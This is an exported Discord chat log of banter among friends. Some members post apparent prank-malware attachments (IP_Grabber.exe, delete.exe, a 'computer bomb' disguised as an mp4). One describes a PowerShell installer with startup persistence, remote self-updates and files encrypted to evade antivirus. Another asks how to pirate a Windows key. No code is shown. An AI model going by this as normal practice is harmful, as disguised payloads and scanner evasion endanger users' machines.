==============================================================
Guild: chaos
Channel: Chaos / lord-help-us
==============================================================

[2/22/2023 9:17 AM] house_of_skies


{Attachments}
https://cdn.discordapp.com/attachments/1077690976602173580/1077957332660649984/thingy_2.mp4?ex=67e40c7f&is=67e2baff&hm=cef0ed6a0d8ab31aebe23bc944e763689e941a5d4b1b913b019adccb82cbd239&


[2/22/2023 9:17 AM] bericprime
Virus?


[2/22/2023 9:17 AM] carbon.tetrachloride
10/10 content


[2/22/2023 9:18 AM] carbon.tetrachloride
i downloaded it and watched it, its truely inspiring footage


[2/22/2023 9:33 AM] the_baller47


{Attachments}
https://cdn.discordapp.com/attachments/1077690976602173580/1077961444890513468/delete.exe?ex=67e41054&is=67e2bed4&hm=34e038402d66edfdd327ab958fa03b2dc669e94e31d4416e7c847f3dfc7a7f62&
https://cdn.discordapp.com/attachments/1077690976602173580/1077961445192511509/IP_Grabber.exe?ex=67e41054&is=67e2bed4&hm=862d62b0d7465780599df16755d2f50c6588a85f7e6fb4dd09abbee70be05729&
https://cdn.discordapp.com/attachments/1077690976602173580/1077961445561614368/Rickroll_Dangerous.exe?ex=67e41054&is=67e2bed4&hm=965dab1c2ebfbf246931b4b8a688372dfe3c322ccac01d0dc85aab68c6499d41&


[3/21/2023 1:26 PM] house_of_skies


{Attachments}
https://cdn.discordapp.com/attachments/1077690976602173580/1087789432058421258/ApproveChildRequest.exe?ex=67e3901a&is=67e23e9a&hm=44f5cd7e4a1ef2c9559cc027d084ea933baf9adcda46721df8a0175359e8dbb8&


[3/21/2023 1:27 PM] house_of_skies


{Attachments}
https://cdn.discordapp.com/attachments/1077690976602173580/1087789699965386882/6bea57fb-8dfb-4177-9ae8-42e8b3529933_RuntimeDeviceInstall.dll?ex=67e3905a&is=67e23eda&hm=3087d60caa61fe078261308c9c9e0381b041638a027cb470c192cfd0c93e5c97&


[3/21/2023 1:29 PM] poushie
Ah yes lemme just download and run all of these on my mobile device


[3/21/2023 1:29 PM] house_of_skies


{Attachments}
https://cdn.discordapp.com/attachments/1077690976602173580/1087790087548448838/Pemmas_Toy.vbs?ex=67e390b7&is=67e23f37&hm=88bf1becc78cf04b69d82875ae6488cc1eec1191a9d0eab3257fda3ed32ec101&


[3/21/2023 1:29 PM] house_of_skies


{Attachments}
https://cdn.discordapp.com/attachments/1077690976602173580/1087790165772214373/thingy_2.mp4?ex=67e390c9&is=67e23f49&hm=2b4843761a2ca24f4ed5ae341098f53f19e652f6ae0854f3196cfc0ad17b80a5&


[3/21/2023 2:30 PM] the_baller47
What is .vbs?


[3/21/2023 2:44 PM] bulbusarues
Violet Ball Sack


[3/21/2023 2:45 PM] bulbusarues
The result of an unfortunate case of testicular torsion


[3/23/2023 11:05 AM] house_of_skies
uhhhh


[3/23/2023 12:03 PM] gy4le
ah how wonderful


[3/25/2023 9:03 PM] vsarca
this looks like powershell


[3/25/2023 9:03 PM] vsarca
but powershell files are .PlayStation1


[3/25/2023 9:03 PM] vsarca
.ps1


[3/25/2023 9:03 PM] the_baller47
What the fuck


[3/25/2023 9:03 PM] the_baller47
You opened it?


[3/25/2023 9:03 PM] vsarca
wdym


[3/25/2023 9:04 PM] vsarca


{Attachments}
https://cdn.discordapp.com/attachments/1077690976602173580/1089354041949175808/image.png?ex=67e3fb42&is=67e2a9c2&hm=6ab39d59c66699315acd2dee0b19619a147ed972a9f874c4483e4a9b2de2c017&


[3/25/2023 9:04 PM] vsarca
its right here


[3/25/2023 9:04 PM] vsarca
im looking at the script


[3/25/2023 9:04 PM] the_baller47
I didn’t know that was a feature


[3/25/2023 9:04 PM] vsarca
?


[3/25/2023 9:05 PM] vsarca
oh you want a good script?


[3/25/2023 9:05 PM] vsarca


{Attachments}
https://cdn.discordapp.com/attachments/1077690976602173580/1089354424746520676/DesktopGooseInstall.ps1?ex=67e3fb9e&is=67e2aa1e&hm=7df486ce0430a46d37108b286b8731e3d669ea959d350fd86a9320ff957f3dd6&


[3/25/2023 9:06 PM] the_baller47
Ah yes


[3/25/2023 9:06 PM] house_of_skies
no


[3/25/2023 9:06 PM] house_of_skies
not that


[3/25/2023 9:06 PM] vsarca
this installs desktop goose


[3/25/2023 9:06 PM] house_of_skies
ik


[3/25/2023 9:06 PM] the_baller47
I installed it by choice


[3/25/2023 9:06 PM] vsarca
and if I could get the job to work


[3/25/2023 9:06 PM] the_baller47
Twice


[3/25/2023 9:06 PM] vsarca
I could tachnically also make it a startup task


[3/25/2023 9:06 PM] vsarca
SO EVERYTIME YOU TURN ON YOUR PC


[3/25/2023 9:06 PM] vsarca
GOOSE


[3/25/2023 9:06 PM] vsarca
also theres an update handler which will check my drive for updates


[3/25/2023 9:06 PM] house_of_skies
imagine creating a alternate version of system32 that opens rickrolls


[3/25/2023 9:07 PM] vsarca
to the software


[3/25/2023 9:07 PM] vsarca


{Attachments}
https://cdn.discordapp.com/attachments/1077690976602173580/1089354851030405230/image.png?ex=67e3fc03&is=67e2aa83&hm=12606f567335d36ab7a5944f08cb5e277e2baf6351a6d74a331c1f51d3e01a49&


[3/25/2023 9:07 PM] house_of_skies


{Attachments}
https://cdn.discordapp.com/attachments/1077690976602173580/1089354952301871214/image.png?ex=67e3fc1b&is=67e2aa9b&hm=4e09dbeaa8fe0304f2567dc92fc3ce670140282cc1a83e0f9f85210686dcb2bc&


[3/25/2023 9:08 PM] vsarca
so I can basically just modify the files, upload them to google drive, and then hopefully when the goose opens it will download and install the new files


[3/25/2023 9:08 PM] vsarca
basically


[3/25/2023 9:08 PM] house_of_skies
huh


[3/25/2023 9:08 PM] vsarca
its unfinished but it works


[3/25/2023 9:08 PM] vsarca
it will install the goose


[3/25/2023 9:08 PM] vsarca
i dont know if anything else works properly


[3/25/2023 9:09 PM] vsarca
OH WAIT


[3/25/2023 9:09 PM] vsarca
it does fully run


[3/25/2023 9:09 PM] vsarca
and with admin it will create a startup task


[3/25/2023 9:09 PM] vsarca
it installs and runs the goose


[3/25/2023 9:09 PM] vsarca
SO COOL


[3/25/2023 9:10 PM] vsarca
if you read the script there is nothing malicious in it and it also contains the google drive link if you want the files


[3/25/2023 9:10 PM] vsarca
but I had to encrypt them to get around the virus scanner


[3/26/2023 12:15 AM] yimyum_ch
uh i think i installed a virus from here


[3/26/2023 12:19 AM] poushie
Which ones did you download


[3/26/2023 12:25 AM] yimyum_ch
the first 1


[3/26/2023 12:26 AM] yimyum_ch
its a mp4 tho


[3/26/2023 8:53 AM] poushie
That’s not a good thing


[3/26/2023 12:15 PM] house_of_skies
ohhh


[3/26/2023 12:15 PM] house_of_skies
the computer bomb


[3/26/2023 3:34 PM] yimyum_ch
computer bomb???


[3/26/2023 3:34 PM] yimyum_ch
wth did you do to my pc


[3/28/2023 9:41 PM] unrealterrashiv
Delete that system 32, you don’t need it


[3/28/2023 10:10 PM] poptab
takes up 10gb, so much wasted space


[5/4/2023 3:14 PM] vsarca
this is what happens when I try to make noise

{Attachments}
https://cdn.discordapp.com/attachments/1077690976602173580/1103761481755021393/image.png?ex=67e3a93c&is=67e257bc&hm=1b6f9e076dc23041947b20602431363d8ca0618161ae6bd5168f38de52e7f0cd&


[5/4/2023 3:14 PM] vsarca
perlin noise should never look anything like that


[8/25/2023 10:33 PM] lumisusii
KURU KURU MOTHERFUCKER

{Attachments}
https://cdn.discordapp.com/attachments/1077690976602173580/1144821787755040858/IMG_0089.png?ex=67e4101f&is=67e2be9f&hm=c1feaacf374003953568ae12bb6b7e556a8bcbcb30b9a7ee98fb869902fea0c4&


[8/26/2023 4:11 AM] house_of_skies
What


[8/26/2023 4:56 AM] bulbusarues
cock and ball torture (CBT), from wikipedia, the free encyclopedia


[8/26/2023 5:08 AM] house_of_skies
What does kuru mean


[9/2/2023 2:57 AM] yimyum_ch
guys im building a pc for my mom


[9/2/2023 2:57 AM] yimyum_ch
whats the best way to pirate a windows key


[9/2/2023 2:57 AM] yimyum_ch
im not paying 190 bucks for that shit


[9/2/2023 9:46 AM] bulbusarues
https://www.kinguin.net/category/22175/windows-10-home-oem-key

{Embed}
https://www.kinguin.net/category/22175/windows-10-home-oem-key
Windows 10 Home OEM Key | Buy cheap on Kinguin.net
What do you need to know about new Windows 10 Home Edition?
Windows 10 Home key is your guarantee of easy access. Get an Operating System that starts up and resumes fast,
https://images-ext-1.discordapp.net/external/l0zRrpEq3BrvrjEfsP29c2AGqwCQc4wHsCrB2wPm0sk/https/static.kinguin.net/cdn-cgi/image/w%3D750%2Cq%3D80%2Cfit%3Dscale-down%2Cf%3Dauto/media/category/0/1/01_1265.jpg


[9/2/2023 9:46 AM] bulbusarues
how I got mine


[9/2/2023 4:35 PM] yimyum_ch
seems sketchy


[9/2/2023 9:27 PM] bulbusarues
I mean


[9/2/2023 9:27 PM] bulbusarues
that's how I got mine


[9/2/2023 9:27 PM] bulbusarues
and it hasn't failed yet so


[9/5/2023 6:08 PM] thesoupmasta
.


[9/5/2023 6:08 PM] thesoupmasta
why do u need a windows key


[9/5/2023 6:08 PM] thesoupmasta
just use the watermark lol


[11/21/2023 8:25 PM] yimyum_ch
https://media.discordapp.net/attachments/586868366321516591/993039423543455754/ClYGZSVA.gif

{Embed}
https://media.discordapp.net/attachments/586868366321516591/993039423543455754/ClYGZSVA.gif
https://media.discordapp.net/attachments/586868366321516591/993039423543455754/ClYGZSVA.gif?ex=67e39d88&is=67e24c08&hm=ec51e967312d6926c6aadd20aa762e9abbeea57c187a3671a9a42d04289c0d6c&


[11/27/2023 10:59 PM] lumisusii


{Attachments}
https://cdn.discordapp.com/attachments/1077690976602173580/1178908023096344636/ClYGZSVA.gif?ex=67e37ba7&is=67e22a27&hm=3e46a57da22fc5be7f4467a746d1dbc93ba770a5084160620b14c7d2301fb339&


[2/22/2024 6:09 PM] _sambooga
https://cdn.discordapp.com/attachments/1045044060047556772/1210346766902362233/rapidsave.com_loser_labor-n3pya26930ic1.mov?ex=65ea3a44&is=65d7c544&hm=f73e7923c4983eff1ff2f7b1c6464ce495b9b0e60dc1f35b88c8489862945e4a&

{Embed}
https://cdn.discordapp.com/attachments/1045044060047556772/1210346766902362233/rapidsave.com_loser_labor-n3pya26930ic1.mov?ex=65ea3a44&is=65d7c544&hm=f73e7923c4983eff1ff2f7b1c6464ce495b9b0e60dc1f35b88c8489862945e4a&


[2/22/2024 6:15 PM] vsarca
bass pro shops


[5/11/2024 2:59 PM] _sambooga
https://youtu.be/idJV-1dlPds?si=Ulb0-yixasyvje92

{Embed}
Harrison Szanto Reid
https://www.youtube.com/watch?v=idJV-1dlPds
John Cena Says "Boobies" and crowd Cheers
https://images-ext-1.discordapp.net/external/0mUfzrocuyBAK6F_Ull3bnZke584Qddum6sFoe9TRCM/https/i.ytimg.com/vi/idJV-1dlPds/hqdefault.jpg


[8/5/2024 5:25 PM] carbon.tetrachloride
w crowd


[8/5/2024 6:59 PM] silverstar15
SODA!!!!!


==============================================================
Exported 93 message(s)
==============================================================
